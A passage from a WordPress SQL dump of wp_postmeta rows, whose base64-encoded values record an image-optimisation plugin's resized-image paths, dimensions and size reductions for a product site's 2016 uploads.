HRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkxNCwidGltZSI6MTQ4MzU2MzAwNywiaWQiOjE3OTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMjA4LCJ0aW1lIjoxNDgzNTYzMDExLCJpZCI6MTc5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI4MzgsInRpbWUiOjE0ODM1NjMwMTQsImlkIjoxNzk4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzMzOSwidGltZSI6MTQ4MzU2MzAxOCwiaWQiOjE3OTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MTksInRpbWUiOjE0ODM1NjMwMjEsImlkIjoxNzk4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTE5LCJ0aW1lIjoxNDgzNTYzMDI1LCJpZCI6MTc5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU5NywidGltZSI6MTQ4MzU2MzAyOCwiaWQiOjE3OTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxOTE3LCJ0aW1lIjoxNDgzNTYzMDMxLCJpZCI6MTc5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDI1LCJ0aW1lIjoxNDgzNTYzMDM1LCJpZCI6MTc5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTk2LCJ0aW1lIjoxNDgzNTYzMDM4LCJpZCI6MTc5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjU4LCJ0aW1lIjoxNDgzNTYzMDQxLCJpZCI6MTc5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04NS0yLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTc4LCJ0aW1lIjoxNDgzNTYzMDQ1LCJpZCI6MTc5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTg1LTItOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODUtMi05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM5NywidGltZSI6MTQ4MzU2MzA0OCwiaWQiOjE3OTh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29164, 1797, 'wpfc_optimisation_reduction', '26741'); 
INSERT INTO `wp_postmeta` VALUES (29165, 1797, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTIuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2MzA1MywiaWQiOiIxNzk3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkyNiwidGltZSI6MTQ4MzU2MzA1NiwiaWQiOjE3OTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMTA4LCJ0aW1lIjoxNDgzNTYzMDYwLCJpZCI6MTc5N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI3OTgsInRpbWUiOjE0ODM1NjMwNjMsImlkIjoxNzk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzE4OSwidGltZSI6MTQ4MzU2MzA2NywiaWQiOjE3OTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MjMsInRpbWUiOjE0ODM1NjMwNzAsImlkIjoxNzk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTE5LCJ0aW1lIjoxNDgzNTYzMDc0LCJpZCI6MTc5N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU5MywidGltZSI6MTQ4MzU2MzA3NywiaWQiOjE3OTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODg3LCJ0aW1lIjoxNDgzNTYzMDgwLCJpZCI6MTc5N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDMzLCJ0aW1lIjoxNDgzNTYzMDg0LCJpZCI6MTc5N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTg2LCJ0aW1lIjoxNDgzNTYzMDg3LCJpZCI6MTc5N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjYxLCJ0aW1lIjoxNDgzNTYzMDkxLCJpZCI6MTc5N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUkVMRUFTWVMtODItMi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTAyNywidGltZSI6MTQ4MzU2MzA5OCwiaWQiOjE3OTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SRUxFQVNZUy04Mi0yLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JFTEVBU1lTLTgyLTItOTB4OTAuanBnIiwicmVkdWN0aW9uIjozOTEsInRpbWUiOjE0ODM1NjMxMDIsImlkIjoxNzk3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29166, 1796, 'wpfc_optimisation_reduction', '27001'); 
INSERT INTO `wp_postmeta` VALUES (29167, 1796, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJBVi5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTYzMTA2LCJpZCI6IjE3OTYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMkFWLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgi